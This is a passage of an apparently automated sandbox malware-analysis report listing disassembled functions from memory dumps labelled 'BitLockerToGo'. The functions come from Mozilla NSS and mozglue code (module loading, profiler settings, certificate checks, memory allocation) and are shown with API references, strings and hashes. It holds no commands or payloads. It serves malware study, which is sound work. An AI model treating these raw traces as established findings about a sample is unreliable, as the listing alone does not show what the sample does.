                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA7594
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA75A2
                                                                                                                                                                                                                                                                                                                    • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CAA75BD
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA75C8
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA75F1
                                                                                                                                                                                                                                                                                                                    • PR_NewLock.NSS3 ref: 6CAA7636
                                                                                                                                                                                                                                                                                                                    • SECMOD_DestroyModule.NSS3(00000000), ref: 6CAA7686
                                                                                                                                                                                                                                                                                                                    • PR_NewLock.NSS3 ref: 6CAA76A2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB598D0: calloc.MOZGLUE(00000001,00000084,6CA80936,00000001,?,6CA8102C), ref: 6CB598E5
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(00000050), ref: 6CAA76B6
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CAA7707
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CAA771C
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CAA7731
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CAA774A
                                                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 6CAA7770
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAA7779
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAA779A
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAA77AC
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(-0000000D), ref: 6CAA77C4
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CAA77DB
                                                                                                                                                                                                                                                                                                                    • strrchr.VCRUNTIME140(?,0000002F), ref: 6CAA7821
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(?), ref: 6CAA7837
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CAA785B
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CAA786F
                                                                                                                                                                                                                                                                                                                    • SECMOD_AddNewModuleEx.NSS3 ref: 6CAA78AC
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA78BE
                                                                                                                                                                                                                                                                                                                    • SECMOD_AddNewModuleEx.NSS3 ref: 6CAA78F3
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA78FC
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAA791C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807AD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807CD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA1204A), ref: 6CA807E4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,6CA1204A), ref: 6CA80864
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA80880
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,6CA1204A), ref: 6CA808CB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808D7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808FB
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • Spac, xrefs: 6CAA7389
                                                                                                                                                                                                                                                                                                                    • ,defaultModDB,internalKeySlot, xrefs: 6CAA748D, 6CAA74AA
                                                                                                                                                                                                                                                                                                                    • kbi., xrefs: 6CAA7886
                                                                                                                                                                                                                                                                                                                    • dll, xrefs: 6CAA788E
                                                                                                                                                                                                                                                                                                                    • sql:, xrefs: 6CAA76FE
                                                                                                                                                                                                                                                                                                                    • dbm:, xrefs: 6CAA7716
                                                                                                                                                                                                                                                                                                                    • extern:, xrefs: 6CAA772B
                                                                                                                                                                                                                                                                                                                    • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CAA74C7
                                                                                                                                                                                                                                                                                                                    • NSS Internal Module, xrefs: 6CAA74A2, 6CAA74C6
                                                                                                                                                                                                                                                                                                                    • rdb:, xrefs: 6CAA7744
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                                                                                                                                                                                                                                                    • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3465160547-3797173233
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ca57b1ac3b6b63511018053b83b75e81fc0e064be3a8e482fb7e88eccbaf4255
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ff04a2d39c9c978e5ac43a39791ed2192ae83ca45a7628ffed6ed5a5366aedb8
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca57b1ac3b6b63511018053b83b75e81fc0e064be3a8e482fb7e88eccbaf4255
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F5204B1E012519BEF118FA4DD057AF7BB4AF09308F184028EC19E7B55E731D99ACB92
                                                                                                                                                                                                                                                                                                                    Function 6C985440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C985492
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9854A8
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9854BE
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C9854DB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB3F: EnterCriticalSection.KERNEL32(6C9FE370,?,?,6C973527,6C9FF6CC,?,?,?,?,?,?,?,?,6C973284), ref: 6C9AAB49
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB3F: LeaveCriticalSection.KERNEL32(6C9FE370,?,6C973527,6C9FF6CC,?,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9AAB7C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: GetCurrentProcess.KERNEL32(?,6C9731A7), ref: 6C9ACBF1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9731A7), ref: 6C9ACBFA
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9854F9
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C985516
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C98556A
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C985577
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000070), ref: 6C985585
                                                                                                                                                                                                                                                                                                                    • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C985590
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C9855E6
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C985606
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C985616
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: EnterCriticalSection.KERNEL32(6C9FE370,?,?,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284), ref: 6C9AAB94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: LeaveCriticalSection.KERNEL32(6C9FE370,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9AABD1
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C98563E
                                                                                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C985646
                                                                                                                                                                                                                                                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C98567C
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C9856AE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C995EDB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: memset.VCRUNTIME140(6C9D7765,000000E5,55CCCCCC), ref: 6C995F27
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: LeaveCriticalSection.KERNEL32(?), ref: 6C995FB2
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C9856E8
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C985707
                                                                                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C98570F
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C985729
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C98574E
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C98576B
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C985796
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C9857B3
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C9857CA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C98548D
                                                                                                                                                                                                                                                                                                                    • GeckoMain, xrefs: 6C985554, 6C9855D5
                                                                                                                                                                                                                                                                                                                    • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C985CF9
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP, xrefs: 6C9855E1
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9854A3
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_HELP, xrefs: 6C985511
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C9857C5
                                                                                                                                                                                                                                                                                                                    • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C985D1C
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C985791
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C985749
                                                                                                                                                                                                                                                                                                                    • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C985D24
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C985AC9
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C985766
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C985B38
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C985BBE
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C9857AE
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9854B9
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C9856E3
                                                                                                                                                                                                                                                                                                                    • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C985D01
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C985717
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] profiler_init, xrefs: 6C98564E
                                                                                                                                                                                                                                                                                                                    • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C985D2B
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C985C56
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C985724
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C98584E
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                                    • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                                                                                                                                                                                                                                    • API String ID: 3686969729-1266492768
                                                                                                                                                                                                                                                                                                                    • Opcode ID: df29e8d76ed383bcb5e9dc5938092102f60c3adf406df914df4dd8b358b42f93
                                                                                                                                                                                                                                                                                                                    • Instruction ID: bf8625e436fdec65f52a6e8e293f688b6909c0ac4de301b28583b89e7d01d92d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df29e8d76ed383bcb5e9dc5938092102f60c3adf406df914df4dd8b358b42f93
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B72216719093409FFB009F74984865AB7F9AFA630CF24492AE86B97B41E731C84DCB53
                                                                                                                                                                                                                                                                                                                    Function 6C986C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C986CCC
                                                                                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C986D11
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0000000C), ref: 6C986D26
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C98CA10: malloc.MOZGLUE(?), ref: 6C98CA26
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C986D35
                                                                                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C986D53
                                                                                                                                                                                                                                                                                                                    • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C986D73
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C986D80
                                                                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32 ref: 6C986DC0
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C986DDC
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C986DEB
                                                                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C986DFF
                                                                                                                                                                                                                                                                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C986E10
                                                                                                                                                                                                                                                                                                                    • CryptMsgClose.CRYPT32(00000000), ref: 6C986E27
                                                                                                                                                                                                                                                                                                                    • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C986E34
                                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C986EF9
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C986F7D
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C986F8C
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C98709D
                                                                                                                                                                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C987103
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C987153
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C987176
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C987209
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C98723A
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C98726B
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C98729C
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C9872DC
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C98730D
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C9873C2
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9873F3
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9873FF
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C987406
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C98740D
                                                                                                                                                                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C98741A
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C98755A
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C987568
                                                                                                                                                                                                                                                                                                                    • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C987585
                                                                                                                                                                                                                                                                                                                    • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C987598
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C9875AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: EnterCriticalSection.KERNEL32(6C9FE370,?,?,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284), ref: 6C9AAB94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: LeaveCriticalSection.KERNEL32(6C9FE370,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9AABD1
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                                                                                                                    • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 63b8aa72c2bbb1a7f2006dba6f798604c95553a62aa4fdb1611e20ece6463d50
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0c517b6fefc84d7ed5d227baae53d516fa2436b876ad017d4dff96a4da80da51
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63b8aa72c2bbb1a7f2006dba6f798604c95553a62aa4fdb1611e20ece6463d50
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 465202B1A053189BEB21CF24CC84BAA77BCEF55708F104599F919A7640DB70EB85CFA1
                                                                                                                                                                                                                                                                                                                    Function 6C9B0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6C9B0F1F
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C9B0F99
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9B0FB7
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6C9B0FE9
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C9B1031
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C9B10D0
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6C9B117D
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000E5,?), ref: 6C9B1C39
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FE744), ref: 6C9B3391
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE744), ref: 6C9B33CD
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C9B3431
                                                                                                                                                                                                                                                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9B3437
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9B37BD
                                                                                                                                                                                                                                                                                                                    • MALLOC_OPTIONS, xrefs: 6C9B35FE
                                                                                                                                                                                                                                                                                                                    • <jemalloc>, xrefs: 6C9B3941, 6C9B39F1
                                                                                                                                                                                                                                                                                                                    • : (malloc) Unsupported character in malloc options: ', xrefs: 6C9B3A02
